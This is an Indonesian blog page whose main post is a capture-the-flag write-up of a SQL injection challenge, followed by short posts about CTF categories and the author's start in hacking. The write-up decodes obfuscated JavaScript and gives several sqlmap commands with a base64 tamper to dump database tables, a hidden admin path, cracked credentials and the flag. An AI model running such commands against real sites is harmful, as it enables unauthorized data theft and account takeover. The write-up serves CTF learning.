Tuesday, July 24, 2018

SQLI Capture Amerika Serikat (Lorem Ipsum) Writeup B2P


SQLI Capture Amerika Serikat (Lorem Ipsum)

Summary:
Di dapati sebuah web yang terlihat hanya web biasa, hanya terdapat data dummies yaitu lorem ipsum,

Solved:
Dengan CTRL + U kemudian saya fokus ke 
Variabel _0x9b7e
Var_0x9b7e=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x63\x68\x61\x72\x41\x74","\x5F\x6B\x65\x79\x53\x74\x72","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6E","\x64\x61\x74\x61\x2E\x70\x68\x70","\x68\x74\x6D\x6C","\x23\x6E\x65\x77\x73\x5F\x69\x64","\x63\x6C\x69\x63\x6B","\x69\x64","\x61\x74\x74\x72","\x65\x6E\x63\x6F\x64\x65","\x23\x6E\x65\x77\x73\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x6F\x73\x74","\x6F\x6E","\x61","\x67\x65\x74","\x72\x65\x61\x64\x79"]
Kemudian saya mencoba untuk mendecode ke Hexa dengan menggunakan Hackbar Modif Hex to Char

Dan menghasilkan 
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / = charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden data.php html #news_id clickidattrencode#news_contentpostonagetready
Saya terfokus pada news_id sama data.php Kemudian saya menggunakan SQLmap untuk melakukan SQLinjection dibagian data.php dan dikarenakan random huruf Abjad dan Angka, ada charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden saya berfikir biasanya  SQL Injection itu ada yang base-64 sehingga saya mencoba dengan 
saya mencoba untuk melihat di burp suite dan saya klik salah satunya saya mendapatkan sedikut cule yaitu terdapat ID yang menggunakan nilai sebagai base64

kemudian saya mencoba melakukan teknik blind sql injection dengan menggunakan SQLmap
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs –random-agent
dan hasilnya adalah sebagai berikut

dan benar saja Vuln SQL injetion kemudian saya melakukan SQL injection untuk mencari nama databasenya di ada dengan Bruteforce punya SQLmap kemudian saya mencari table yang ada di dalam database tersebut 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent --tables 
dan di dapat 3 table dengan nama sebagai berikut 
kemudian saya mencoba untuk dump di bagian config dengan menggunakan 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T config –dump
dan hasilnya sebagai berikut 

dan ternya itu menyiman url dari adminya yaitu /1n1admbr0
kemudian saya dump data tabel n1mbusadmin dengan menggunakan seperti di bawah ini 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T n1mbusadmin –dump


kemudian saya mendapatkan hasil setelah brutefoce password menggunakan wolrdlist dari SQLmap sendiri dan saya mendapatkan sebagai berikut

Kemudian saya mencoba membuka url tersebut di http://35.187.236.126:8013/1n1admbr0/
dan saya masukan user backupuser dan password linkinpark kemudian saya login dan mendownload flag tersebut
kemudian saya download flag tersebut dan mendapatakan flag tersebut
setelah saya download kemudian saya mendapatkan flag tersebut flag tersebut adalah

dan Flagnya adalah 
B2P{af39e6e718f3fb8f2de9ae9e6464b150}

Monday, July 23, 2018

CTF Cryptografi

Topik kriptografi adalah topik yang sangat abstrak, Anda harus belajar mulai dari enkripsi paling sederhana (rot13, xor, dsb), sampai topik yang rumit seperti RSA, dan bahkan topik kriptografi yang tidak standar lainnya. Berbagai tools standar (Seperti command line openssl) perlu dikuasai.

bisanya kebanyakan saya menggunakan tools online jika di soal ini maklum masih newbiew hehehehe

CTF Forensik

Dalam Topik Forensi, bisanya diminta untuk mengekstrat data dari sebuag file. File ini bisa berupa disk image, bisa berupa Network Capture. Dalam hal ini, kita perlu tahu mengenai berbagai jenis filesystem dan tool-tools yang berkaitan dengan itu, tools forensik bisanya sleuthkit, Volatility,binwalk dan masih banyak lagi. untuk forensic yang berhubungan dengan networking misalnya menggunakan Wireshark untuk menggetahui data HTTP, FTP, HTTPS, dan sebagainya. cara memahami protokol-protokol ini, selain dengan banyak membaca adalah dengan mempraktikan dengan mencapture pcket menggunakan wireshark.

Kompetisi Jaringan Itu Asik Unik dan Bikin Pusing

Awal mula saya hanya iseng aja maklum saya Joomblo..... :( dari bermain di dunia hacking awal di iseng dan coba coba dari situ mulai banyak teman yang bisa di bilang panutanku. hehehe maklum newbiew gag tau apa apa cuman pingin lihat lihat dulu siapa tau jodoh.. hehehe.

dari yang awalnya cuman suka ngegunain exploit public dan gag tau apa itu CTF. CTF adalah Capture The Flag dimana peserta harus menemukan flag yang mempunyai point point dan categori sendiri. CTF sendiri digunakan untuk menguji sejauh mana peserta bisa untuk menemukan bug yang sudah sudah di sediakan oleh panitia biasanya bug sebagai hadianya adalah point. anggap bug adalah flag dalam kompetisi CTF.

kalau dibilang CTF itu susah gag Sih ? awalnya emang susah dan cocok buat para joomblo yang gabut gabut. dari pada malam minggu di dijalan macetin jalan mending di kamar kaya ane. "Di sini saya tidak mencontohkan untuk jadi joomblo ya. hehehe"

CTF sendiri biasanya ada beberapa categori 
1. Forensik
2. Web (PHP)
3. SQl
4. Reversing Enginering
5. Cryptografi
6. PWN
7. Programming
8. Misc

Sekian curhatan saya. tetep belajar ya broo jangan bosan bosan. jika ada yang mau curhat silakan tulis di komentar :) hehehe